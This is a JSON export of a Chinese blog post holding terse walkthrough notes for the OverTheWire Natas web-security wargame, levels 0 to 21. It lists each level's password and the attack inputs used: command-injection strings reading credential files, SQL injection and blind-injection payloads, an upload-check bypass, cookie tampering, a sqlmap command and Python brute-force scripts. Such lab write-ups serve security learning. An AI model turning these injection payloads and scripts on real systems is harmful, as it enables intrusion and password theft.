{"id":1036,"date":"2025-01-25T10:26:53","date_gmt":"2025-01-25T02:26:53","guid":{"rendered":"http:\/\/xiyu12.top\/?p=1036"},"modified":"2025-01-25T10:26:53","modified_gmt":"2025-01-25T02:26:53","slug":"natas1-19","status":"publish","type":"post","link":"http:\/\/www.xiyu12.top\/?p=1036","title":{"rendered":"natas1-19"},"content":{"rendered":"\n<h4 class=\"wp-block-heading\">http\u534f\u8bae\u8ba4\u8bc1<\/h4>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>\u57fa\u672c\u8ba4\u8bc1\uff08Basic Authentication\uff09<\/strong>\uff1a\u5728\u00a0<a href=\"https:\/\/datatracker.ietf.org\/doc\/html\/rfc7617\" target=\"_blank\" rel=\"noreferrer noopener\">RFC 7617<\/a>\u00a0\u4e2d\u8fdb\u884c\u4e86\u8be6\u7ec6\u5b9a\u4e49\uff0c\u5ba2\u6237\u7aef\u5c06\u7528\u6237\u540d\u548c\u5bc6\u7801\u4ee5\u00a0<code>username:password<\/code>\u00a0\u7684\u683c\u5f0f\u7ec4\u5408\u5e76\u8fdb\u884c Base64 \u7f16\u7801\uff0c\u7136\u540e\u5728\u8bf7\u6c42\u5934\u7684\u00a0<code>Authorization<\/code>\u00a0\u5b57\u6bb5\u4e2d\u4ee5\u00a0<code>Basic &lt;\u7f16\u7801\u540e\u7684\u5b57\u7b26\u4e32><\/code>\u00a0\u7684\u5f62\u5f0f\u53d1\u9001\u7ed9\u670d\u52a1\u5668\u3002<\/li>\n\n\n\n<li><strong>\u6458\u8981\u8ba4\u8bc1\uff08Digest Authentication\uff09<\/strong>\uff1a\u7531\u00a0<a href=\"https:\/\/datatracker.ietf.org\/doc\/html\/rfc7616\" target=\"_blank\" rel=\"noreferrer noopener\">RFC 7616<\/a>\u00a0\u89c4\u8303\uff0c\u5b83\u4f7f\u7528\u54c8\u5e0c\u7b97\u6cd5\u6765\u907f\u514d\u5bc6\u7801\u660e\u6587\u4f20\u8f93\uff0c\u901a\u8fc7\u670d\u52a1\u5668\u548c\u5ba2\u6237\u7aef\u4e4b\u95f4\u7684\u6311\u6218 &#8211; \u54cd\u5e94\u673a\u5236\u5b8c\u6210\u8ba4\u8bc1\u3002<\/li>\n\n\n\n<li><strong>NTLM \u8ba4\u8bc1<\/strong>\uff1a\u867d\u7136\u4e0d\u662f\u6807\u51c6\u7684 HTTP \u89c4\u8303\uff0c\u4f46\u5728 Windows \u7f51\u7edc\u73af\u5883\u4e2d\u5e7f\u6cdb\u4f7f\u7528\uff0c\u6709\u5176\u7279\u5b9a\u7684\u5de5\u4f5c\u6d41\u7a0b\u548c\u6d88\u606f\u683c\u5f0f\u3002<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">curl<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">curl -i http:\/\/natas17.natas.labs.overthewire.org\/index.php &#8211;basic -u natas17:EqjHJbo7LFNb8vwhHb9s75hokh5TF0OC<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">sqlmap<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">sqlmap -u http:\/\/natas17.natas.labs.overthewire.org\/index.php &#8211;auth-type=basic &#8211;auth-cred=natas17:EqjHJbo7LFNb8vwhHb9s75hokh5TF0OC &#8211;dbms=mysql &#8211;data username=natas18 &#8211;level=5 &#8211;risk=3 &#8211;technique=T &#8211;dump &#8211;batch<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">natas0-1 \uff1a<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u67e5\u770b\u6e90\u7801<br>0nzCigAq7t2iALyvU9xcHlYN4MlkIwlq<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">natas1-2 \uff1a<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">f12 \u67e5\u770b\u5143\u7d20<br>TguMNxKo1DSa1tujBLuZJnDUlCcUAPlI<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<h4 class=\"wp-block-heading\">natas2-3:<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u8bbf\u95ee files \u6587\u4ef6\u5939 \u4e2d\u7684user.txt<br>3gqisGdR0pjm6tpkDKdIWO2hSvchLeYH<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">natas3-4:<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">robots\u6587\u4ef6<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><br>QryZXc2e0zahULdHrtHxzyYkj59kUxLQ<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">natas4-5: <\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u6dfb\u52a0 \u8bf7\u6c42\u5934<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">modheader<br>Referer http:\/\/natas5.natas.labs.overthewire.org\/<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">0n35PkggAPm2zbEpOU802c0x0Msn1ToK<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">natas5-6:<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u4fee\u6539cookie \u4e2d\u7684\u8ba4\u8bc1\u53c2\u6570 \u503c\u4e3a1<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Cookie: _ga=GA1.1.1201777083.1737336658; _ga_RD0K2239G0=GS1.1.1737336657.1.1.1737338614.0.0.0; loggedin=1<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\"> 0RoJwHdSKWFTYR5WuiAewauSuNaBXned<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">natas6-7\uff1a<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u8bbf\u95ee\u6587\u4ef6 includes\/secret.inc<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">includes\/secret.inc &#8220;; } else { print &#8220;Wrong secret&#8221;; } } ?&gt;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\"> bmg8SvU1LizuWjx3y7xkNERkHxGre0GS<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<h4 class=\"wp-block-heading\">natas7-8\uff1a<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u6587\u4ef6\u5305\u542b<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">hint: password for webuser natas8 is in \/etc\/natas_webpass\/natas8<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">xcoXLmzMkoIP9D7hlgPlh9XD7OgLAe5Q<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">natas8-9\uff1a<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u6839\u636e\u4ee3\u7801\u89e3\u7801<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">from hex<br>reverse<br>from base64 &#8220;; } else { print &#8220;Wrong secret&#8221;; } } ?&gt;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"> ZE1ck82lmdGIoErlhQgWND6j2Wzz6b6t<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">$apr1$p5hxEdIi$jDg7hmdch008hyW9lyEIr0:<br>ZE1ck82lmdGIoErlhQgWND6j2Wzz6b6t<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">natas9-10:<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u547d\u4ee4\u6ce8\u5165<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>a ; find \/ -user natas9 2&gt;\/dev\/null\n.\n.\/.htaccess\n.\/dictionary.txt\n.\/index.php\n.\/.htpasswd<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u8bfb\u53d6  \/etc\/natas_webpass\/natas10<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">t7I5VHvpa14sJTUGV0cbEsbYfFP2dmOu<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\/etc\/natas_webpass\/natas11<\/p>\n\n\n\n<h4 class=\"wp-block-heading\"><br>natas10-11:<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u9650\u5236\u547d\u4ee4\u6ce8\u5165\uff0c\u4f7f\u7528grep\u6784\u9020\u8bfb\u53d6\u6587\u4ef6<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">.* \/etc\/natas_webpass\/natas11 #<br>UJdqkK1pTu6VLt9UHWAgRZz6sVUZ3lEk<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">natas11-12: <\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u6839\u636e\u4ee3\u7801  \u4ececookie \u628a\u503c\u4f20\u7ed9showpassword \u6240\u5728\u6570\u7ec4<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u503c\u7684\u6784\u9020 \u901a\u8fc7 xor \u8fd0\u7b97\uff0c\u53ef\u4ee5\u8fdb\u884c\u9006\u8fd0\u7b97\u83b7\u53d6key\uff0c\u7528\u5f53\u524dcookie \u548c \u4ee3\u7801\u4e2d\u5199\u6b7b\u7684\u660e\u6587\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">yZdkjAYZRd3R7tq7T5kXMjMJlOIkzDeB<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">document.cookie=&#8221;data=&#8221;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>{\"showpassword\":\"yes\",\"bgcolor\":\"#ffffff\"}\nxor\nbase64 \"no\", \"bgcolor\"=&gt;\"#ffffff\"); function xor_encrypt($in) { $key = ''; $text = $in; $outText = ''; \/\/ Iterate through each character for($i=0;$i<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\">natas12-13:<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u540e\u53f0\u6ca1\u6709\u6821\u9a8c\u6587\u4ef6\u540d\uff0c\u6587\u4ef6\u4e0a\u4f20<br>trbs5pCjCrkuSknBBKHhaBxq6Wm1j3LC<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">cat  \/etc\/natas_webpass\/natas13<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<h4 class=\"wp-block-heading\"><br>natas13-14:<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u6dfb\u52a0\u4e86\u56fe\u7247\u6821\u9a8c\uff0c\u5728\u5305\u4e2d\u6dfb\u52a0gif\u7684\u9b54\u672f\u5b57<br>z3UYcr4v4uBpeX8f7EZbMHlzK4UR2XtQ <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>1000) { echo \"File is too big\"; } else { if(move_uploaded_file($_FILES&#91;'uploadedfile']&#91;'tmp_name'], $target_path)) { echo \"The file <a href=\"\/%22$target_path\/%22\">$target_path<\/a> has been uploaded\"; } else{ echo \"There was an error uploading the file, please try again!\"; } } } else { ?&gt;<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">cat \/etc\/natas_webpass\/natas14<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">natas14-15:<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">sql\u6ce8\u5165\uff0c\u6784\u9020\u4e00\u4e2a or 1=1 \u6761\u4ef6\u4e3a\u771f \u8fd4\u56de\u5bc6\u7801<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6dfb\u52a0 ?debug \u53c2\u6570\u6765\u67e5\u770b $query \u7684\u5185\u5bb9<br>username=admin&amp;password=admin&#8221; or 1=1 &#8212; &#8211; <br>SdqIqBsFcz3yotlNYErZSZwblkm0lrvx<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>'); mysqli_select_db($link, 'natas14'); $query = \"SELECT * from users where username=\\\"\".$_REQUEST&#91;\"username\"].\"\\\" and password=\\\"\".$_REQUEST&#91;\"password\"].\"\\\"\"; if(array_key_exists(\"debug\", $_GET)) { echo \"Executing query: $query\n\"; } if(mysqli_num_rows(mysqli_query($link, $query)) &gt; 0) { echo \"Successful login! The password for natas15 is\n\"; } else { echo \"Access denied!\n\"; } mysqli_close($link); } else { ?&gt;<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\">natas15-16<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u5e03\u5c14\u76f2\u6ce8\uff0c<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">a &#8221; and ascii(substr(password,1,1))=ascii(&#8216;h&#8217;) &#8212; &#8211; <\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&#8221; OR ascii(substr(password,1,1)) = ascii(&#8216;h&#8217;) &#8212; &#8211; &#8216;); <\/p>\n\n\n\n<p class=\"wp-block-paragraph\">This user exists.  \u5224\u65ad\u503c<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>mysqli_select_db($link, 'natas15'); $query = \"SELECT * from users where username=\\\"\".$_REQUEST&#91;\"username\"].\"\\\"\"; if(array_key_exists(\"debug\", $_GET)) { echo \"Executing query: $query\n\"; } $res = mysqli_query($link, $query); if($res) { if(mysqli_num_rows($res) &gt; 0) { echo \"This user exists.\n\"; } else { echo \"This user doesn't exist.\n\"; } } else { echo \"Error in query.\n\"; } mysqli_close($link); } else { ?&gt;\n<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>import requests<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>url = \"http:\/\/natas15.natas.labs.overthewire.org\/index.php\"\nuu = \"\"     <\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>head = {\"Authorization\": \"Basic bmF0YXMxNTpTZHFJcUJzRmN6M3lvdGxOWUVyWlNad2Jsa20wbHJ2eA==\",'Content-Type': 'application\/x-www-form-urlencoded'}<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>s = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789\"<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>for i in range(1,33):<br>for x in s:<br>p=f\"username=natas16\\\" and ascii(substr(password,{i},1)) = ascii('{x}') -- -\"<br>re = requests.post(url=url,data=p,headers=head)<br>print(\".\"*i)<br>if \"This user exists.\" in re.text:<br>uu+=x<br>print(\"&#91;+]:\",uu)<br>break<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>print(uu)<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\">natas16-17:<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u547d\u4ee4\u6ce8\u5165\u548cgrep\u88ab\u8fdb\u4e00\u6b65\u9650\u5236\uff0c\u4f7f\u7528 (grep ^x   \/etc\/natas_webpass\/natas17 )\u8fd4\u56de\u7684\u503c\u6765\u5224\u65ad\u6587\u4ef6\u4e2d\u662f\u5426\u5b58\u5728x\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">grep -i \\&#8221;$key\\&#8221; dictionary.txt<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">grep -i \\&#8221;African$(grep ^a \/etc\/natas_webpass\/natas17)  \\&#8221; dictionary.txt<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5f53$()\u4e2d\u6ca1\u6709\u8fd4\u56de\u503c  \u5c31\u4f1a\u6574\u4e2a\u547d\u4ee4\u8fd4\u56deAfrican\uff0c\u4ee5\u6b64\u6765\u5224\u65ad\u8fdb\u884c\u5e03\u5c14\u76f2\u6ce8<br>EqjHJbo7LFNb8vwhHb9s75hokh5TF0OC<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>import requests<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>url=\"http:\/\/natas16.natas.labs.overthewire.org\/index.php\"<br>uu = \"EqjHJbo7LFNb8vwhHb9s75hokh5TF0O\"<br>head = {\"Authorization\": \"Basic bmF0YXMxNjpoUGtqS1l2aUxRY3RFVzMzUW11WEw2ZURWZk1XNHNHbw==\",'Content-Type': 'application\/x-www-form-urlencoded'}<br>s = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789\"<br>for i in range(1,33):<br>for x in s:<br>dd=uu+x<br>t = f\"African$(grep ^{dd} \/etc\/natas_webpass\/natas17)\"<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>    p = {\"needle\":t}\n    print(\"*\"*i)\n\n    re = requests.get(url=url,params=p,headers=head)\n\n    if  not \"African\" in re.text:\n        uu+=x\n        print(\"&#91;+]\",uu)\n        break<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>print(uu)<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<h4 class=\"wp-block-heading\">natas17-18<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u65f6\u95f4\u76f2\u6ce8<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f7f\u7528 like binary \u8bed\u53e5 \u5bf9password \u7684\u503c\u8fdb\u884c\u679a\u4e3e\uff0c\u8fdb\u884c\u65f6\u95f4\u76f2\u6ce8<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">SELECT * from users where username=&#8221;natas17 or 1=1 &#8212; -&#8220;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">natas17&#8243; and sleep(10) &#8212; &#8211;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">natas17&#8243; and if((ascii(substr(password,1,1)) =ascii(&#8216;U&#8217;)), sleep(10), 3) &#8212; &#8211;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">import time<br>use_time = time.time() &#8211; start_time<br>if use_time&gt;5<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">natas18&#8243; and password like binary &#8220;%a%&#8221; and sleep(5) &#8212; &#8211;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">bKdVjyBlpxgD4DDbRG6ZLlCGgCJ<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ<\/p>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"wp-block-code\"><code>import requests<br>import string<br>import time<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>\"\"\"str = string.ascii_letters+string.digits\"\"\"<br>s = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789\"<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>url = \"http:\/\/natas17.natas.labs.overthewire.org\/index.php\"<br>f = \"\"<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>head = {\"Authorization\": \"Basic bmF0YXMxNzpFcWpISmJvN0xGTmI4dndoSGI5czc1aG9raDVURjBPQw==\",\"Content-Type\": \"application\/x-www-form-urlencoded\"}<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>for i in s:<br>p=f\"username=natas18\\\" and password like binary \\\"%{i}%\\\" and sleep(2) -- -\"<br>re = requests.post(url=url,data=p,headers=head)<br>print(re.status_code,re.elapsed.seconds)<br>if re.elapsed.seconds &gt;= 2:<br>f+=i<br>print(f)<br>uu = \"\"<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>for i in range(1,33):<br>for x in s:<br>dd= uu+x<br>p=f\"username=natas18\\\" and password like binary \\\"{dd}%\\\" and sleep(2) -- -\"<br>re = requests.post(url=url, data=p, headers=head)<br>print(re.status_code, re.elapsed.seconds)<br>if re.elapsed.seconds &gt;= 2:<br>uu+=x<br>print(uu)<br>break<br># time.sleep(1)<br>print(uu)<\/code><\/pre>\n<\/div><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">natas18-19:<br>tnwER7PdfWkxsG4FNWUtoAZ9VyZTJqJr<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Username: natas19<br>Password: tnwER7PdfWkxsG4FNWUtoAZ9VyZTJqJr<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Username: natas20<br>Password: p5mCvP7GS2K6Bmt3gqhM2Fc1A5T8MVyw<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">echo 123-admin | xxd -d | tr -d &#8216; &#8216;| cut -d &#8220;:&#8221; -f 2 | grep -oP &#8220;[0-9a-z]{2,}(?=0a)&#8221;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Username: natas21<br>Password: BPhv63cKE1lkQl04cE5CuFTzXe15NfiH<\/p>\n","protected":false},"excerpt":{"rendered":"<p>http\u534f\u8bae\u8ba4\u8bc1 curl curl -i http:\/\/natas17.natas.labs.overthe [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-1036","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"_links":{"self":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/1036","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1036"}],"version-history":[{"count":0,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/1036\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1036"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1036"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1036"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}